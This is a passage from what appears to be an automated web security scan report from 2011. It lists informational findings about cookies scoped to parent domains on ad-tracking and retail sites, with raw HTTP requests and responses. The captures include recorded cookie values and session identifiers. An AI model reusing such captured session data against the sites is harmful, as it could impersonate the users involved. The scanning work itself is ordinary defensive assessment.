partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUzMjM0NjcK; expires=Thu, 06-Sep-2012 15:37:47 GMT; path=/; domain=.spotxchange.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /track/tag/6382.1008/img HTTP/1.1 Host: search.spotxchange.com Proxy-Connection: keep-alive Referer: http://img-cdn.mediaplex.com/0/17353/universal.html?page_name=netsuite_homepage&NetSuite_Homepage=1&mpuid= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUxMDMyNjMK; partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo
Response
HTTP/1.1 302 Found Date: Tue, 06 Sep 2011 15:37:47 GMT Server: Apache P3P: CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV ADMa"Set-Cookie: history-0=eNrVkttygjAQhq%2Ftu7STEMXSOygBwxQyxcghdxi0BhCY6UHJ0zdKDw%2FQ2pleJrv%2Fv%2F9%2Bs8z2byCE08mdY06vlzgm9gPh2L3LWado%2B6JohRWVARB7ryqM5pVDC2wypyHVqRaapI13fCBzobpj6HayyCJVpsmW%2Bx7gSzIvmP5XGFAmUKjIjKLQjFgny733XKYrSQ1sRlU%2F6lUn8zQ2eBYA7dOIxur5%2FdkbUEmMyBVonIsNnanOs3iXIWdYI95zPxkyo6nHum0S%2BZ1JLII3joLdOvnyg1qvhK93Gd8nP5Cn5bZIH3Wm2gwZPkbuedb0syb2ScXTWbVJrGazcHrR1h%2B95HDeS%2Bcvfa%2FNUKJOu2tfNWqFpAhaEzbSnl2etlsPkbsC%2F4o2uwRtAG4vTRvqu1aRm6Of0A7V0%2FB3tO0D%2FeXbvnoHx%2BZvDQ%3D%3D; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com Set-Cookie: partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com Set-Cookie: user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUzMjM0NjcK; expires=Thu, 06-Sep-2012 15:37:47 GMT; path=/; domain=.spotxchange.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue, 06 Sep 2011 15:37:47 GMT Cache-Control: no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Location: http://cdn.spotxchange.com/media/thumbs/pixel/pixel.gif Content-Type: text/html Content-Length: 0
12.62. http://server.iad.liveperson.net/hc/52793056/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://server.iad.liveperson.net
Path:
/hc/52793056/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:LivePersonID=-5110247826455-1315323140:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 15:32:31 GMT; path=/hc/52793056; domain=.liveperson.net The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hc/52793056/?&site=52793056&cmd=mTagKnockPage&lpCallId=802803296362-872958060353&protV=20&lpjson=1&id=5840223757&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1 Host: server.iad.liveperson.net Proxy-Connection: keep-alive Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=5110247826455,d=1314795678
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickACTIVE=1315323151587; expires=Wed, 07-Sep-2011 15:32:31 GMT; path=/ Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Tue, 06 Sep 2011 15:32:31 GMT Set-Cookie: HumanClickSiteContainerID_52793056=STANDALONE; path=/hc/52793056Set-Cookie: LivePersonID=-5110247826455-1315323140:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 15:32:31 GMT; path=/hc/52793056; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1484 lpConnLib.Process({"ResultSet": {"lpCallId":"802803296362-872958060353","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper...[SNIP]...
12.63. http://services.krxd.net/geoip
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://services.krxd.net
Path:
/geoip
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ServedBy=logger-b003; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:20:27 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /geoip?root_name=KRUX.ST.geo HTTP/1.1 Host: services.krxd.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Response
HTTP/1.1 200 OK Cache-Control: private, max-age=28800 Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:00:27 GMT Etag: "833b91a59b2962c75db21f499c2e9829d1408b57" P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC" Server: Krux CacheSet-Cookie: ServedBy=logger-b003; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:20:27 GMT Via: 1.1 logger-b003.krxd.net X-Age: 1 X-Cache: HIT X-Cache-Hits: 1 X-GeoIP: 50.23.123.106 X-Request-Backend: geoip X-Request-Time: D=543 t=1315321227510505 X-Served-By: logger-b003.krxd.net X-Served-By: logger-b003.krxd.net Content-Length: 75 Connection: keep-alive KRUX.ST.geo={"country": "US", "region": "TX", "city": "Dallas", "dma": 623}
12.64. http://services.krxd.net/pixel.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://services.krxd.net
Path:
/pixel.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ServedBy=logger-b011; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:17:00 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel.gif?_kcp_d=cnbc.com&_kpref_=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D(The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM)%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh&_kuid=HK4OZLzp&_kpa_site=cnbc&_kpa_sect=home&_kpa_sub=homeus&_kpa_pageid=15839285&_kpa__c=homeus&_kpa_tandomad=none&_kpa_pm=1&kplt0=146&fired=beforeunload&_knifr=4&_kpid=d719e39d-e4be-4896-8d71-71012d0c51a0&_kcp_s=cnbc.com&_kcp_sc=home&_kcp_ssc=homeus HTTP/1.1 Host: services.krxd.net Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b005
Response
HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: private, no-cache, no-store Content-Type: image/gif Date: Tue, 06 Sep 2011 14:57:00 GMT Last-Modified: Thu, 25 Aug 2011 01:26:31 GMT P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC" Server: ApacheSet-Cookie: ServedBy=logger-b011; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:17:00 GMT X-Request-Time: D=258 t=1315321020652677 X-Served-By: logger-b011.krxd.net Content-Length: 42 Connection: keep-alive GIF89a.............!.......,........@..D.;
12.65. http://tags.bluekai.com/site/3834
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tags.bluekai.com
Path:
/site/3834
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:bk=noTeVCDC+h5Mq/0A; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com bkc=KJh5NWN/PaWDOded4KdBCeBMU2HYoSeJ7/u1/GJYZ5aaCx+4xHCukG+CUnHNTzRGvOske0M/Hul5ODV/+R7WYP3tzaa1RnVRwixUqx/q0eg7pjp7wH4ZpK1cdlmdlgtl+CVTUesT4Uy6B9O38YccQ0AGeyKqf3974ytRLUyCoElGZmFaiHl9RLge7d8ufs2PGlyLoXlNTAdqQRBBcr8NkAvFT5T6keAF7iswgH71qCEeJB8sFr3TXkwfxzJEqFsNQbgm7pZQp4lqU3ctrdTPxh2F/72+2m4eG/7VbrPLwzdpR0d5Ne82x8F4TMn2wVLaOkqw67yUMgv4mrqhiJ2xd4yXzsgiDkEwfofD8gpTa3l+mLllH4+9fm2q+WBbqcm2IJ6w2Wye5XCKyIBU+eIz6a8twcJWINYq53aaZdrlEqdRFlCF6dQgZ4gTtw8FvJ2nSlBfTrLJVGXCsgwkADOftwn6B+owbyqFnDX8EkSNLTflmKqthj2ozLZEyWUydcjaeChpUk0Adq5D1li1KMNfd0iDmudKAysStypZcFUcEMFZFcCF12675O8K8yr6F0rftV+6Y5MZFciuI++J8IFXXfbG7gN/btIqXIJU2etY1gYxbT62k5UZFnC1pkYIrNY/7D2gzNbXuFlB64tun4UWwr0RXIvdBwXFsyRdmMS2zkKfBSK2lvf5HI4eBgzF4+MT4Fzd5GjWd95p2O71; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/3834 HTTP/1.1 Host: tags.bluekai.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: bk=gmD52hDC+h5Mq/0A; bkc=KJh5NeNGDNWROreldiEuJLD45sinQgWZa3GG/iQ+uErG5mCPWvPGLDB/CbTmnG3Yk+nie0MRxz5rQivkrGikWHy5miQH3Qfho2MOHSiYN4Kf0qA2lTczJ9IXlp77mdKKZy5xF9o1chZnwwfwXpgU37lVXDiTT5HVRvcPhIdOurvF5Dd8zWaqbG6dqQct+4iTtNtJdvqf1NYVFwW64V7PyXhbmDgMEKhhhfD4tF5EF7JfGOlV54fAUZtjldR0h2ddghyaKOlfulmI9O8SrazFjCo8bDIXKWwfhcP+IEVrXr+oOpY6zGg2pCXuwlWLbpaIpw38mKeTkx+hFqClxkF0hMK8+tFL2l7UDmJFZfxMUgSklFC+9wHB9q5oFI7nafU4c2PKzMhbDnr7DfFDgilptIR7XDdt5TFggtDqbh1cFbOXm31+Thk4ulWdCgkZ0bmC2GMk3zNX7+RXFn1XbEC5NXT8lrNRhM4IhmquhTepAwbthyT5u2bTpm5FXRIcHtMDidK1xP70hMrpxar7C2ZcQTApMiPFFvLBsmj8KaDLX4ZrfHYFXiPQVdnsW8hFsXdUZVzezqNTQ4+FVdnsnlAdyiGyUICwwJ7EkghhkzT0lNL3Ju8Z+YPFF1n8jFkI0PUbWC2ync7MFIpdXf3cfdABn2dHfiCGnlPoedOXtJqhMHX6f2I2e26Hi42z+Q0L; bko=KJhf0X49XB1pNRIHyjQ4hMGZ0LexgykilKOQRcY+ixS0JgWh1shPX4PMj8M/eVWh1jpZRZeGOq/RsKETRS0pleeVnhW/iT7Cei21nOc/rLReWo1atF+YpzSwZDWu0ZJA99YljOt7; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0aAg6FxNWRh7dUE4UeP6LMyzYAxSDkOAv6m7uQ9bnSHkn2J6H1H9KhtuyZGNkihivHBm/wxmQPBGwGJLfg+MtPa7zT8IxXfd1Ipl7KIpA12agz3LNenQTsqLdj/50Bt/CcqEbmhMHueWJL0YnSj33fMlWyvjMOw+ubcojN1yFmAmRcZJFxdaaPWlBqleiC7SZkh7pdovgiMSyOUxuZsNzB3u3Dab70LpaF3XHlTs/VTZVUeATMQCE1u9X10BkPxMbeUWjVCII8Sn9U+PItKYklnNc+Iu40IiLic/4u1SsLPrI8F+5dMcO1hZ1ht9HKMCK6rkK5SSkAS5RQeyAfd0LWrD8GJvDuhtVHP+6bYYNgjcFaHixpAbt17j7TtaP/EYcFCFyBE6kGPC0Mb+7mlm68pXFBpefkMFASUi4ajm1o73h3UxKwvSNf/m4V03pr6loVdH7oUwgrfvPfEukVc4tPjqlEn2H6MMT=; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpn+16wb9D9y+ejQPVux9SlyLv; bkst=KJhBEf+v9NWDwWP91aWetZGPLwcY7FrIVrQSPyCZN6i/uL9irlzUJuxH1Ri2k7bOvqVhLTiPkHXQPGodTu5T5b+15jQj8L0DTc6KcvqgmNWJw+h5Q8C8BOaVWYA0ugiUS5/pNJ9AkMEVNiS2Nsh+qpFdkdwwyUMRcT8rC+IP6aadMkGsokO0vxPcnqDVE9MpVXCl84yeE87CUcZWoSi/PiRM6ioameG/0twHLtINlw2z7F7yDaYgaR9P/YQ1SrGhxjWpoEtMI5BMyIkgYy9PbcSwg68lypTm2iXZjlrm4NZzijGVDj2n9O+x2TBtzBeLBgBsJh3xTvHNKblwO2AGeeSpP7HTPOIwnGwx2TBmdS5RAPEpYAyZ1+q1/CD357rHozAWzFtIZk59e0VEDi3rLwl3HddTzNKo; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; bklc=4e66358a; bkdc=sf
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:28 GMT Server: Apache/2.2.3 (CentOS) P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Wed, 07 Sep 2011 15:00:28 GMT Cache-Control: max-age=86400, privateSet-Cookie: bk=noTeVCDC+h5Mq/0A; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh5NWN/PaWDOded4KdBCeBMU2HYoSeJ7/u1/GJYZ5aaCx+4xHCukG+CUnHNTzRGvOske0M/Hul5ODV/+R7WYP3tzaa1RnVRwixUqx/q0eg7pjp7wH4ZpK1cdlmdlgtl+CVTUesT4Uy6B9O38YccQ0AGeyKqf3974ytRLUyCoElGZmFaiHl9RLge7d8ufs2PGlyLoXlNTAdqQRBBcr8NkAvFT5T6keAF7iswgH71qCEeJB8sFr3TXkwfxzJEqFsNQbgm7pZQp4lqU3ctrdTPxh2F/72+2m4eG/7VbrPLwzdpR0d5Ne82x8F4TMn2wVLaOkqw67yUMgv4mrqhiJ2xd4yXzsgiDkEwfofD8gpTa3l+mLllH4+9fm2q+WBbqcm2IJ6w2Wye5XCKyIBU+eIz6a8twcJWINYq53aaZdrlEqdRFlCF6dQgZ4gTtw8FvJ2nSlBfTrLJVGXCsgwkADOftwn6B+owbyqFnDX8EkSNLTflmKqthj2ozLZEyWUydcjaeChpUk0Adq5D1li1KMNfd0iDmudKAysStypZcFUcEMFZFcCF12675O8K8yr6F0rftV+6Y5MZFciuI++J8IFXXfbG7gN/btIqXIJU2etY1gYxbT62k5UZFnC1pkYIrNY/7D2gzNbXuFlB64tun4UWwr0RXIvdBwXFsyRdmMS2zkKfBSK2lvf5HI4eBgzF4+MT4Fzd5GjWd95p2O71; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=sf; expires=Wed, 07-Sep-2011 15:00:28 GMT; path=/; domain=.bluekai.com BK-Server: bbc9 Content-Length: 62 Content-Type: image/gif GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;
12.66. http://www.actonsoftware.com/acton/bn/1227/visitor.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.actonsoftware.com
Path:
/acton/bn/1227/visitor.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:wp1227=UVVADDDDDDTKKMZM; Domain=.actonsoftware.com; Expires=Wed, 05-Sep-2012 15:32:50 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /acton/bn/1227/visitor.gif?ts=1315341157226&ref=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio HTTP/1.1 Host: www.actonsoftware.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Set-Cookie: wp1227=UVVADDDDDDTKKMZM; Domain=.actonsoftware.com; Expires=Wed, 05-Sep-2012 15:32:50 GMT; Path=/ P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: image/gif;charset=UTF-8 Content-Length: 43 Date: Tue, 06 Sep 2011 15:32:49 GMT Connection: close GIF89a.............!.......,...........L..;
12.67. http://www.bizographics.com/collect/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.bizographics.com
Path:
/collect/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Sun, 04-Sep-2016 15:33:01 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /collect/?pid=901&url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&pageUrl=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&time=1315341168499 HTTP/1.1 Host: www.bizographics.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizographicsOptOut=OPT_OUT
Response
HTTP/1.1 200 OK Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:33:01 GMT Server: nginx/0.7.61 Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/ Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/ Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/ Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Tue, 06-Sep-2011 15:33:02 GMT; Path=/Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Sun, 04-Sep-2016 15:33:01 GMT; Path=/ Content-Length: 9 Connection: keep-alive //opt out
12.68. http://www.marykay.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=9C5046FD4D123B0E95A0D3931B51113E; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?pid=mk HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 137 Content-Type: text/html; charset=utf-8 Location: /default.aspx?pid=mk Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Set-Cookie: Subsidiary=US; path=/Set-Cookie: TLTHID=9C5046FD4D123B0E95A0D3931B51113E; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:44 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/ <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/default.aspx?pid=mk">here</a>.</h2> </body></html>
12.69. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=B0890FBE43C33E288B82AEB1B9B92B68; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /CONTENT/HPflash/Thumbs/tb_eyebundles.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 880 Content-Type: image/jpeg Last-Modified: Tue, 07 Jun 2011 19:44:24 GMT Accept-Ranges: bytes ETag: "8661ea4d4b25cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=B0890FBE43C33E288B82AEB1B9B92B68; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................#.....[SNIP]...
12.70. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=D17FE5DF44B2B04AF2B926961FD1F468; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /CONTENT/HPflash/Thumbs/tb_makeupartist.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000
Response
